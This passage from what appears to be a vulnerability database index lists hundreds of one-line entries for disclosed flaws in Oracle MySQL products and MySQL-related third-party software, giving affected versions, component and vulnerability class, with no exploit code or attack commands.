18007| [129642] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Optimizer denial of service
18008| [129641] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Optimizer denial of service
18009| [129640] Oracle MySQL Server up to 5.7.24/8.0.13 Optimizer denial of service
18010| [129639] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 DDL denial of service
18011| [129638] Oracle MySQL Server up to 8.0.13 DDL denial of service
18012| [129637] Oracle MySQL Server up to 8.0.13 DDL denial of service
18013| [129636] Oracle MySQL Server up to 8.0.13 Connection denial of service
18014| [129635] Oracle MySQL Server up to 5.7.24/8.0.13 InnoDB denial of service
18015| [129634] Oracle MySQL Server up to 8.0.13 InnoDB denial of service
18016| [129631] Oracle MySQL Server up to 8.0.13 Replication denial of service
18017| [129630] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Connection Handling denial of service
18018| [129629] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Parser denial of service
18019| [129628] Oracle MySQL Server up to 5.7.24/8.0.13 Parser denial of service
18020| [129627] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 PS denial of service
18021| [129626] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Optimizer denial of service
18022| [129625] Oracle MySQL Server up to 8.0.13 Privileges unknown vulnerability
18023| [129624] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Replication unknown vulnerability
18024| [129623] Oracle MySQL Workbench up to 8.0.13 OpenSSL denial of service
18025| [129622] Oracle MySQL Connectors up to 2.1.8/8.0.13 Connector/Python unknown vulnerability
18026| [129621] Oracle MySQL Workbench up to 8.0.13 unknown vulnerability
18027| [127905] Open Dental up to 18.3 MySQL Database Default Credentials weak authentication
18028| [127404] Drobo 5N2 NAS 4.0.5-13.28.96115 MySQL API Error Page cross site scripting
18029| [127403] Drobo 5N2 NAS 4.0.5-13.28.96115 /mysql/api/droboapp/data information disclosure
18030| [127400] Drobo 5N2 NAS 4.0.5-13.28.96115 Access Control /mysql/api/logfile.php Parameter information disclosure
18031| [127396] Drobo 5N2 NAS 4.0.5-13.28.96115 Access Control /mysql/api/drobo.php information disclosure
18032| [127395] Drobo 5N2 NAS 4.0.5-13.28.96115 Access Control /mysql/api/diags.php Parameter information disclosure
18033| [127350] Dell OpenManage Network Manager up to 6.4.x MySQL privilege escalation
18034| [126982] LAOBANCMS 2.0 install/mysql_hy.php directory traversal
18035| [126687] LAOBANCMS 2.0 mysql_hy.php privilege escalation
18036| [125937] mysql-binuuid-rails up to 1.1.0 Database Column sql injection
18037| [125825] ThinkPHP 3.2.4 Mysql.class.php parseKey Parameter sql injection
18038| [125568] Oracle MySQL Server up to 8.0.12 Privileges unknown vulnerability
18039| [125567] Oracle MySQL Server up to 5.7.23/8.0.12 Logging denial of service
18040| [125566] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
18041| [125565] Oracle MySQL Server up to 8.0.12 Windows denial of service
18042| [125564] Oracle MySQL Server up to 5.5.61/5.6.41/5.7.23/8.0.12 Storage Engines denial of service
18043| [125563] Oracle MySQL Server up to 8.0.12 Roles denial of service
18044| [125562] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 RBR denial of service
18045| [125561] Oracle MySQL Server up to 5.7.23/8.0.12 Partition denial of service
18046| [125560] Oracle MySQL Server up to 8.0.12 Optimizer denial of service
18047| [125559] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 Memcached denial of service
18048| [125558] Oracle MySQL Server up to 8.0.12 JSON denial of service
18049| [125557] Oracle MySQL Server up to 8.0.12 Information Schema denial of service
18050| [125556] Oracle MySQL Server up to 8.0.12 DDL denial of service
18051| [125555] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
18052| [125554] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
18053| [125553] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
18054| [125552] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
18055| [125551] Oracle MySQL Server up to 5.7.23/8.0.12 Partition denial of service
18056| [125549] Oracle MySQL Server up to 5.7.23/8.0.12 Optimizer denial of service
18057| [125548] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 Merge denial of service
18058| [125547] Oracle MySQL Server up to 8.0.12 DDL denial of service
18059| [125546] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
18060| [125545] Oracle MySQL Server up to 5.7.23/8.0.12 Audit denial of service
18061| [125544] Oracle MySQL Server up to 8.0.12 Parser denial of service
18062| [125543] Oracle MySQL Server up to 5.5.61/5.6.41/5.7.23/8.0.12 Parser denial of service
18063| [125542] Oracle MySQL Server up to 8.0.12 Optimizer denial of service
18064| [125541] Oracle MySQL Server up to 8.0.12 Optimizer denial of service
18065| [125540] Oracle MySQL Server up to 8.0.12 DML denial of service
18066| [125539] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 InnoDB denial of service
18067| [125538] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 InnoDB denial of service
18068| [125537] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 InnoDB denial of service
18069| [125536] Oracle MySQL Server up to 5.7.23/8.0.12 Parser denial of service
18070| [125535] Oracle MySQL Server up to 5.5.61/5.6.41/5.7.23/8.0.12 InnoDB unknown vulnerability
18071| [125534] Oracle MySQL Enterprise Monitor up to 3.4.9.4237/4.0.6.5281/8.0.2.8191 Monitoring unknown vulnerability
18072| [125533] Oracle MySQL Connectors up to 8.0.12 Connector/J unknown vulnerability
18073| [125532] Oracle MySQL Enterprise Monitor up to 3.4.9.4237/4.0.6.5281/8.0.2.8191 Monitoring unknown vulnerability
18074| [125531] Oracle MySQL Enterprise Monitor up to 3.4.9.4237/4.0.6.5281/8.0.2.8191 Monitoring unknown vulnerability
18075| [125415] Oracle Enterprise Manager for MySQL Database 13.2 EM Plugin unknown vulnerability
18076| [122549] PHP up to 7.1.5 mysqli_real_escape_string memory corruption
18077| [122201] mysql_user Module up to 2.2.0 on Ansible Password Change weak authentication
18078| [121802] Oracle MySQL Server up to 8.0.11 DDL unknown vulnerability
18079| [121800] Oracle MySQL Server up to 5.5.60/5.6.40/5.7.22 Encryption weak encryption
18080| [121799] Oracle MySQL Server up to 5.5.60/5.6.40/5.7.22 Options unknown vulnerability
18081| [121798] Oracle MySQL Workbench up to 6.3.10 Encryption weak encryption
18082| [121797] Oracle MySQL Server up to 5.7.22/8.0.11 Privileges unknown vulnerability
18083| [121796] Oracle MySQL Server up to 5.5.60/5.6.40/5.7.22 MyISAM information disclosure
18084| [121795] Oracle MySQL Server up to 8.0.11 Privileges denial of service
18085| [121794] Oracle MySQL Server up to 5.5.60 Privileges denial of service
18086| [121793] Oracle MySQL Server up to 8.0.11 Replication denial of service
18087| [121792] Oracle MySQL Server up to 5.7.22 DML denial of service
18088| [121791] Oracle MySQL Server up to 8.0.11 DDL denial of service
18089| [121790] Oracle MySQL Server up to 8.0.11 DDL denial of service
18090| [121789] Oracle MySQL Server up to 5.7.22/8.0.11 DDL denial of service
18091| [121788] Oracle MySQL Server up to 5.7.22/8.0.11 DDL denial of service
18092| [121787] Oracle MySQL Server up to 8.0.11 InnoDB denial of service
18093| [121786] Oracle MySQL Server up to 5.7.22 Audit Log denial of service
18094| [121785] Oracle MySQL Client up to 5.5.60/5.6.40/5.7.22/8.0.11 Client Programs denial of service
18095| [121784] Oracle MySQL Server up to 5.6.40/5.7.22/8.0.11 Memcached denial of service
18096| [121783] Oracle MySQL Server up to 8.0.11 Roles denial of service
18097| [121782] Oracle MySQL Workbench up to 8.0.11 denial of service
18098| [121781] Oracle MySQL Server up to 8.0.11 Optimizer denial of service
18099| [121780] Oracle MySQL Server up to 5.6.40/5.7.22/8.0.11 Installing denial of service
18100| [121779] Oracle MySQL Server up to 5.7.22/8.0.11 DML denial of service
18101| [121778] Oracle MySQL Server up to 5.7.22/8.0.11 InnoDB denial of service
18102| [121777] Oracle MySQL Server up to 5.5.60/5.6.40/5.7.22 Client mysqldump denial of service
18103| [121776] Oracle MySQL Enterprise Monitor up to 3.4.7.4297/4.0.4.5235/8.0.0.8131 Monitoring denial of service
18104| [121775] Oracle MySQL Connectors up to 5.3.10/8.0.11 Connector/ODBC denial of service
18105| [121774] Oracle MySQL Server up to 5.6.40/5.7.22/8.0.11 InnoDB denial of service
18106| [121773] Oracle MySQL Workbench up to 8.0.11 unknown vulnerability
18107| [121772] Oracle MySQL Enterprise Monitor up to 3.4.7.4297/4.0.4.5235/8.0.0.8131 Service Manager unknown vulnerability
18108| [121613] Oracle Enterprise Manager for MySQL Database up to 13.2.2.0.0 EM Plugin unknown vulnerability
18109| [120277] query-mysql 0.0.0/0.0.1/0.0.2 on Node.js sql injection
18110| [118340] mysqljs on Node.js Backdoor privilege escalation
18111| [118305] MySQL Module up to v2.0.0-alpha7 on Node.js mysql.escape sql injection
18112| [117517] MySQL Multi-Master Replication Manager 2.2.1 on Solaris mmm_agentd send_arp MMM Protocol Message command injection
18113| [117516] MySQL Multi-Master Replication Manager 2.2.1 on FreeBSD mmm_agentd clear_ip MMM Protocol Message command injection
18114| [117515] MySQL Multi-Master Replication Manager 2.2.1 on Solaris mmm_agentd clear_ip MMM Protocol Message command injection
18115| [117514] MySQL Multi-Master Replication Manager 2.2.1 on Linux mmm_agentd clear_ip MMM Protocol Message command injection
18116| [117513] MySQL Multi-Master Replication Manager 2.2.1 on FreeBSD mmm_agentd add_ip MMM Protocol Message command injection
18117| [117512] MySQL Multi-Master Replication Manager 2.2.1 on Solaris mmm_agentd add_ip MMM Protocol Message command injection
18118| [117511] MySQL Multi-Master Replication Manager 2.2.1 on Linux mmm_agentd add_ip MMM Protocol Message command injection
18119| [117510] MySQL Multi-Master Replication Manager 2.2.1 mmm_agentd _execute MMM Protocol Message command injection
18120| [117387] CSP MySQL User Manager 2.3.1 Username sql injection
18121| [116762] Oracle MySQL Server up to 5.5.59/5.6.39/5.7.21 DDL information disclosure
18122| [116761] Oracle MySQL Server up to 5.5.59/5.6.39/5.7.21 Locking denial of service
18123| [116759] Oracle MySQL Server up to 5.7.21 Group Replication GCS denial of service
18124| [116758] Oracle MySQL Server up to 5.7.21 Pluggable Auth denial of service
18125| [116757] Oracle MySQL Server up to 5.7.21 Performance Schema denial of service
18126| [116756] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
18127| [116755] Oracle MySQL Server up to 5.5.59/5.6.39/5.7.21 Optimizer denial of service
18128| [116754] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
18129| [116753] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
18130| [116752] Oracle MySQL Server up to 5.7.21 DML denial of service
18131| [116751] Oracle MySQL Server up to 5.5.59/5.6.39/5.7.21 Privileges denial of service
18132| [116750] Oracle MySQL Server up to 5.7.21 InnoDB denial of service
18133| [116749] Oracle MySQL Server up to 5.7.21 InnoDB denial of service
18134| [116748] Oracle MySQL Server up to 5.6.39/5.7.21 InnoDB denial of service
18135| [116747] Oracle MySQL Server up to 5.7.21 InnoDB denial of service
18136| [116745] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
18137| [116744] Oracle MySQL Server up to 5.6.39/5.7.21 InnoDB denial of service
18138| [116743] Oracle MySQL Server up to 5.7.21 InnoDB denial of service
18139| [116742] Oracle MySQL Server up to 5.5.59/5.6.39/5.7.21 Client programs denial of service
18140| [116741] Oracle MySQL Enterprise Monitor up to 3.3.7.3306/3.4.5.4248/4.0.2.5168 Monitoring: Agent (OpenSSL) information disclosure
18141| [116740] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
18142| [116739] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
18143| [116738] Oracle MySQL Server up to 5.5.59/5.6.39/5.7.21 DDL denial of service
18144| [116737] Oracle MySQL Server up to 5.6.39/5.7.21 Privileges denial of service
18145| [116736] Oracle MySQL Server up to 5.5.59/5.6.39/5.7.21 InnoDB denial of service
18146| [116735] Oracle MySQL Server up to 5.6.39/5.7.21 InnoDB denial of service
18147| [116734] Oracle MySQL Server up to 5.6.39/5.7.21 InnoDB denial of service
18148| [116733] Oracle MySQL Server up to 5.6.39 GIS Extension denial of service
18149| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
18150| [116620] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Spring Framework) unknown vulnerability
18151| [116619] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General unknown vulnerability
18152| [115836] Juniper Junos Space up to 13.3R1.7 MySQL Server Default Credentials weak authentication
18153| [115216] MySQL for PCF Tiles up to 1.7.9 AWS Access Key privilege escalation
18154| [114055] Couch up to 2.0 mysql2i.func.php Request information disclosure
18155| [112112] Oracle MySQL Server up to 5.6.38/5.7.20 Performance Schema information disclosure
18156| [112111] Oracle MySQL Server up to 5.6.38/5.7.20 Performance Schema denial of service
18157| [112110] Oracle MySQL Server up to 5.7.20 Optimizer denial of service
18158| [112109] Oracle MySQL Server up to 5.7.20 Optimizer denial of service
18159| [112108] Oracle MySQL Server up to 5.7.20 InnoDB denial of service
18160| [112107] Oracle MySQL Server up to 5.7.20 DML denial of service
18161| [112106] Oracle MySQL Server up to 5.7.20 DML denial of service
18162| [112105] Oracle MySQL Server up to 5.7.20 DML denial of service
18163| [112104] Oracle MySQL Server up to 5.6.38/5.7.19 Partition denial of service
18164| [112103] Oracle MySQL Server up to 5.6.38/5.7.20 Replication denial of service
18165| [112102] Oracle MySQL Server up to 5.6.38/5.7.20 Packaging information disclosure
18166| [112101] Oracle MySQL Enterprise Monitor up to 3.3.6.3293/3.4.4.4226/4.0.0.5135 Monitoring information disclosure
18167| [112100] Oracle MySQL Connectors up to 5.3.9 ODBC Connector information disclosure
18168| [112099] Oracle MySQL Server up to 5.5.58/5.6.38/5.7.20 Optimizer denial of service
18169| [112098] Oracle MySQL Server up to 5.5.58/5.6.38/5.7.20 Optimizer denial of service
18170| [112097] Oracle MySQL Server up to 5.5.58/5.6.38/5.7.20 Optimizer denial of service
18171| [112096] Oracle MySQL Server up to 5.6.38/5.7.20 GIS denial of service
18172| [112095] Oracle MySQL Server up to 5.5.58/5.6.38/5.7.20 DDL denial of service
18173| [112094] Oracle MySQL Server up to 5.6.38/5.7.20 Privileges denial of service
18174| [112093] Oracle MySQL Server up to 5.6.38/5.7.20 InnoDB denial of service
18175| [112092] Oracle MySQL Server up to 5.6.38/5.7.20 Stored Procedure denial of service
18176| [112091] Oracle MySQL Server up to 5.5.58/5.6.38/5.7.19 Partition denial of service
18177| [112090] Oracle MySQL Server up to 5.6.38/5.7.20 Privileges denial of service
18178| [112089] Oracle MySQL Connectors up to 6.9.9/6.10.4 Connector/Net denial of service
18179| [112088] Oracle MySQL Enterprise Monitor up to 3.3.6.3293/3.4.4.4226/4.0.0.5135 Monitoring privilege escalation
18180| [110974] puppetlabs-mysql up to 3.6.0 Parameter weak authentication
18181| [108192] Oracle MySQL Server up to 5.7.18 InnoDB denial of service
18182| [108190] Oracle MySQL Server up to 5.6.37/5.7.19 InnoDB denial of service
18183| [108189] Oracle MySQL Server up to 5.7.18 Stored Procedure denial of service
18184| [108188] Oracle MySQL Server up to 5.7.19 Replication denial of service
18185| [108187] Oracle MySQL Server up to 5.6.37/5.7.19 Optimizer denial of service
18186| [108186] Oracle MySQL Server up to 5.6.36/5.7.18 Optimizer denial of service
18187| [108185] Oracle MySQL Server up to 5.6.37/5.7.19 Optimizer denial of service
18188| [108184] Oracle MySQL Server up to 5.6.37/5.7.19 Memcached denial of service
18189| [108183] Oracle MySQL Server up to 5.7.19 InnoDB denial of service
18190| [108182] Oracle MySQL Server up to 5.7.19 FTS denial of service
18191| [108181] Oracle MySQL Server up to 5.7.18 DML denial of service
18192| [108180] Oracle MySQL Server up to 5.7.19 Group Replication GCS denial of service
18193| [108179] Oracle MySQL Server up to 5.6.37/5.7.19 Performance Schema denial of service
18194| [108178] Oracle MySQL Connectors up to 6.9.9 Connector/Net denial of service
18195| [108177] Oracle MySQL Connectors up to 6.9.9 Connector/Net unknown vulnerability
18196| [108176] Oracle MySQL Server up to 5.5.57/5.6.37/5.7.11 Optimizer denial of service
18197| [108175] Oracle MySQL Server up to 5.7.19 Optimizer denial of service
18198| [108174] Oracle MySQL Server up to 5.6.37/5.7.19 FTS denial of service
18199| [108173] Oracle MySQL Server up to 5.5.57/5.6.37/5.7.19 DDL denial of service
18200| [108172] Oracle MySQL Server up to 5.5.57/5.6.37/5.7.19 Client programs information disclosure
18201| [108171] Oracle MySQL Server up to 5.6.35/5.7.18 OpenSSL denial of service
18202| [108170] Oracle MySQL Server up to 5.6.37/5.7.19 Pluggable Auth denial of service
18203| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
18204| [108168] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Web unknown vulnerability
18205| [104089] Oracle MySQL Server up to 5.5.56/5.6.36/5.7.18 DDL unknown vulnerability
18206| [104088] Oracle MySQL Server up to 5.7.18 C API information disclosure
18207| [104087] Oracle MySQL Server up to 5.5.56/5.6.36/5.7.18 DDL unknown vulnerability
18208| [104086] Oracle MySQL Server up to 5.5.56/5.6.36/5.7.18 Client mysqldump unknown vulnerability
18209| [104085] Oracle MySQL Server up to 5.6.36/5.7.18 Replication denial of service
18210| [104084] Oracle MySQL Server up to 5.6.36/5.7.18 Replication denial of service
18211| [104083] Oracle MySQL Server up to 5.5.56/5.6.36/5.7.18 Charsets denial of service
18212| [104082] Oracle MySQL Cluster up to 7.3.5 CLSTCONF memory corruption
18213| [104081] Oracle MySQL Server up to 5.7.16 X Plugin denial of service
18214| [104080] Oracle MySQL Server up to 5.7.18 Optimizer denial of service
18215| [104079] Oracle MySQL Server up to 5.7.18 Optimizer denial of service
18216| [104078] Oracle MySQL Server up to 5.7.18 Optimizer denial of service
18217| [104077] Oracle MySQL Server up to 5.7.18 DML denial of service
18218| [104076] Oracle MySQL Server up to 5.7.18 DML denial of service
18219| [104075] Oracle MySQL Server up to 5.5.56/5.6.36/5.7.18 DML denial of service
18220| [104074] Oracle MySQL Server up to 5.7.18 DML denial of service
18221| [104073] Oracle MySQL Server up to 5.7.18 DML denial of service
18222| [104072] Oracle MySQL Server up to 5.7.18 X Plugin denial of service
18223| [104071] Oracle MySQL Server up to 5.7.18 UDF denial of service
18224| [104069] Oracle MySQL Server up to 5.5.56/5.6.36/5.7.18 C API denial of service
18225| [104068] Oracle MySQL Connectors up to 6.1.10 Connector/C denial of service
18226| [104067] Oracle MySQL Server up to 5.6.35/5.7.17 OpenSSL unknown vulnerability
18227| [104066] Oracle MySQL Connectors up to 5.3.7 OpenSSL unknown vulnerability
18228| [104065] Oracle MySQL Connectors up to 6.1.9 OpenSSL unknown vulnerability
18229| [104064] Oracle MySQL Server up to 5.6.36/5.7.18 DML denial of service
18230| [104063] Oracle MySQL Server up to 5.6.36/5.7.18 Memcached denial of service
18231| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
18232| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
18233| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
18234| [103583] phpMyAdmin 4.0/4.4/4.6 MySQL Database Connection privilege escalation
18235| [103578] MySQL Dumper 1.24 Stored cross site scripting
18236| [102980] DBD::mysql Module up to 4.043 on Perl SSL weak encryption
18237| [102979] DBD::mysql Module up to 4.043 on Perl Error Use-After-Free memory corruption
18238| [102618] KBVault Mysql Free Knowledge Base 0.16a File Upload Explorer.aspx privilege escalation
18239| [100915] Accellion FTA communication_p2p.php mysql_real_escape_string sql injection
18240| [100543] Oracle MySQL up to 5.1.40 Connector/J privilege escalation
18241| [100232] Oracle MySQL Server up to 5.7.17 Encryption weak encryption
18242| [100231] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Monitoring denial of service
18243| [100228] Oracle MySQL Workbench up to 6.3.8 Encryption information disclosure
18244| [100227] Oracle MySQL Server up to 5.7.17 C API information disclosure
18245| [100226] Oracle MySQL Server up to 5.7.17 Privileges unknown vulnerability
18246| [100225] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 DDL unknown vulnerability
18247| [100224] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 Privileges denial of service
18248| [100223] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 Privileges denial of service
18249| [100222] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 Privileges denial of service
18250| [100221] Oracle MySQL Server up to 5.7.17 Optimizer denial of service
18251| [100220] Oracle MySQL Server up to 5.7.17 DML denial of service
18252| [100219] Oracle MySQL Server up to 5.7.17 DML denial of service
18253| [100218] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 DML denial of service
18254| [100217] Oracle MySQL Server up to 5.7.17 Audit Plug-in denial of service
18255| [100215] Oracle MySQL Server up to 5.5.54/5.6.35 C API information disclosure
18256| [100214] Oracle MySQL Server up to 5.7.17 Privileges unknown vulnerability
18257| [100213] Oracle MySQL Cluster up to 7.2.27/7.3.16/7.4.14/7.5.5 DD denial of service
18258| [100212] Oracle MySQL Server up to 5.7.17 InnoDB denial of service
18259| [100211] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 OpenSSL information disclosure
18260| [100210] Oracle MySQL Enterprise Backup up to 3.12.3/4.0.3 ENTRBACK information disclosure
18261| [100209] Oracle MySQL Connectors up to 5.1.41 Connector/J unknown vulnerability
18262| [100208] Oracle MySQL Server up to 5.6.35 Optimizer denial of service
18263| [100207] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 Optimizer denial of service
18264| [100206] Oracle MySQL Server up to 5.7.17 DML denial of service
18265| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
18266| [100204] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 Client mysqldump unknown vulnerability
18267| [100203] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 Thread Pooling denial of service
18268| [100202] Oracle MySQL Server up to 5.6.35/5.7.17 Pluggable Auth Integer denial of service
18269| [100201] Oracle MySQL Server up to 5.6.35/5.7.17 Memcached denial of service
18270| [100200] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 Optimizer denial of service
18271| [100199] Oracle MySQL Server up to 5.5.54/5.6.35/5.7.17 DML denial of service
18272| [100198] Oracle MySQL Workbench up to 6.3.7 OpenSSL memory corruption
18273| [100197] Oracle MySQL Enterprise Backup up to 3.12.2/4.0.1 ENTRBACK memory corruption
18274| [100196] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Monitoring: Server denial of service
18275| [100195] Oracle MySQL Workbench up to 6.3.8 OpenSSL denial of service
18276| [100194] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Struts 2 privilege escalation
18277| [99815] ATutor 2.2.1 mysql_connect.inc.php searchFriends sql injection
18278| [97041] MySQL DBD::mysql up to 4.38 denial of service
18279| [96814] MariaDB up to 5.5.54/10.0.29/10.1.21/10.2.3 libmysqlclient.so denial of service
18280| [96808] Oracle MySQL up to 5.6.21/5.7.4 libmysqlclient.so denial of service
18281| [95832] Zabbix up to 2.0.17/2.2.12/3.0.2 Configuration Script userparameter_mysql.conf) privilege escalation
18282| [95730] Oracle MySQL Server up to 5.7.16 Encryption weak encryption
18283| [95729] Oracle MySQL Server up to 5.7.16 X Plugin unknown vulnerability
18284| [95728] Oracle MySQL Cluster 7.2.25/7.3.14/7.4.12 Cluster NDBAPI denial of service
18285| [95727] Oracle MySQL Cluster 7.2.25/7.3.14/7.4.12 denial of service
18286| [95726] Oracle MySQL Cluster 7.2.19/7.3.8/7.4.5 denial of service
18287| [95723] Oracle MySQL Server 5.6.34/5.7.16 Replication denial of service
18288| [95722] Oracle MySQL Server up to 5.5.53 Charsets denial of service
18289| [95720] Oracle MySQL Cluster 7.2.26/7.3.14/7.4.12 NDBAPI denial of service
18290| [95719] Oracle MySQL Server up to 5.7.16 Optimizer denial of service
18291| [95716] Oracle MySQL Server up to 5.7.16 Replication denial of service
18292| [95715] Oracle MySQL Server 5.5.53/5.6.34/5.7.16 Optimizer denial of service
18293| [95714] Oracle MySQL Server 5.6.34 5.7.16 InnoDB denial of service
18294| [95713] Oracle MySQL Server 5.5.53/5.6.34/5.7.16 DML denial of service
18295| [95712] Oracle MySQL Server 5.6.34/5.7.16 DDL denial of service
18296| [95711] Oracle MySQL Server 5.5.53/5.6.34/5.7.16 DDL denial of service
18297| [95709] Oracle MySQL Server 5.6.34/5.7.16 Encryption denial of service
18298| [95708] Oracle MySQL Enterprise Monitor 3.1.3.7856 Monitoring Agent memory corruption
18299| [95707] Oracle MySQL Enterprise Monitor 3.1.4.7895/3.2.4.1102/3.3.0.1098 Monitoring denial of service
18300| [95706] Oracle MySQL Enterprise Monitor 3.1.4.7895/3.2.1.1049 Monitoring memory corruption
18301| [95705] Oracle MySQL Enterprise Monitor 3.1.5.7958/3.2.1.1049, Monitoring privilege escalation
18302| [95704] Oracle MySQL Enterprise Monitor 3.1.4.7895/3.2.1.1049 Monitoring unknown vulnerability
18303| [93866] DBD-mysql up to 3.x/4.040 on Perl Use-After-Free memory corruption
18304| [92923] Oracle MySQL Server up to 5.6.33/5.7.15 Encryption denial of service
18305| [92911] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 MySQL weak encryption
18306| [92900] Oracle MySQL Server up to 5.5.51/5.6.32/5.7.14 Optimizer denial of service
18307| [92899] Oracle MySQL Server up to 5.6.31/5.7.13 InnoDB denial of service
18308| [92898] Oracle MySQL Server up to 5.5.51/5.6.32/5.7.14 GIS denial of service
18309| [92897] Oracle MySQL Server up to 5.5.51 DML denial of service
18310| [92896] Oracle MySQL Server up to 5.5.50/5.6.31/5.7.13 DML denial of service
18311| [92895] Oracle MySQL Server up to 5.6.31 5.7.13 DML denial of service
18312| [92874] Oracle MySQL Connector up to 2.1.3/2.0.4 Connector/Python unknown vulnerability
18313| [92850] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 MySQL denial of service
18314| [92835] Oracle MySQL Server up to 5.7.13 Audit denial of service
18315| [92834] Oracle MySQL Server up to 5.7.13 RBR denial of service
18316| [92833] Oracle MySQL Server up to 5.7.13 Performance Schema denial of service
18317| [92832] Oracle MySQL Server up to 5.7.14 Optimizer denial of service
18318| [92831] Oracle MySQL Server up to 5.7.13 Memcached denial of service
18319| [92830] Oracle MySQL Server up to 5.6.32/5.7.14 InnoDB denial of service
18320| [92829] Oracle MySQL Server up to 5.6.31 5.7.13 InnoDB denial of service
18321| [92828] Oracle MySQL Server up to 5.7.13 InnoDB denial of service
18322| [92827] Oracle MySQL Server up to 5.5.51/5.6.32/5.7.14 Federated denial of service
18323| [92826] Oracle MySQL Server up to 5.7.13 DML denial of service
18324| [92821] Oracle MySQL Server up to 5.7.13 Replication denial of service
18325| [92820] Oracle MySQL Server up to 5.7.13 Performance Schema denial of service
18326| [92819] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 MySQL denial of service
18327| [92818] Oracle MySQL Server up to 5.5.52/5.6.33/5.7.15 Encryption information disclosure
18328| [92817] Oracle MySQL Server up to 5.5.51/5.6.32/5.7.14 Types denial of service
18329| [92815] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 MySQL denial of service
18330| [92814] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 MySQL denial of service
18331| [92813] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 MySQL denial of service
18332| [92798] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 MySQL denial of service
18333| [92797] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 MySQL denial of service
18334| [92790] Oracle MySQL Server up to 5.7.14 Privileges information disclosure
18335| [92789] Oracle MySQL Server up to 5.6.30/5.7.12 InnoDB Plugin unknown vulnerability
18336| [92292] libdbd-mysql-perl 4.028 Error Message denial of service
18337| [91920] Open Dental up to 16.1 MySQL Server Default Credentials weak authentication
18338| [91625] PHP up to 5.6.25/7.0.10 mysqlnd Heap-based memory corruption
18339| [91505] Oracle MySQL up to 5.5.52/5.6.33/5.7.15 Logging my.cnf privilege escalation
18340| [90877] DBD::mysql up to 4.033 my_login memory corruption
18341| [90876] DBD::mysql up to 4.028 Use-After-Free memory corruption
18342| [90137] Oracle MySQL Server up to 5.5.48/5.6.29/5.7.10 Encryption information disclosure
18343| [90136] Oracle MySQL Server up to 5.5.48/5.6.29/5.7.11 Connection information disclosure
18344| [90134] Oracle MySQL Server up to 5.7.12 Encryption denial of service
18345| [90133] Oracle MySQL Server up to 5.7.12 Replication denial of service
18346| [90132] Oracle MySQL Server up to 5.5.49/5.6.30/5.7.12 RBR denial of service
18347| [90131] Oracle MySQL Server up to 5.6.30/5.7.12 Privileges denial of service
18348| [90130] Oracle MySQL Server up to 5.7.12 Optimizer denial of service
18349| [90129] Oracle MySQL Server up to 5.7.12 Log denial of service
18350| [90128] Oracle MySQL Server up to 5.6.30/5.7.12 InnoDB denial of service
18351| [90127] Oracle MySQL Server up to 5.7.12 InnoDB denial of service
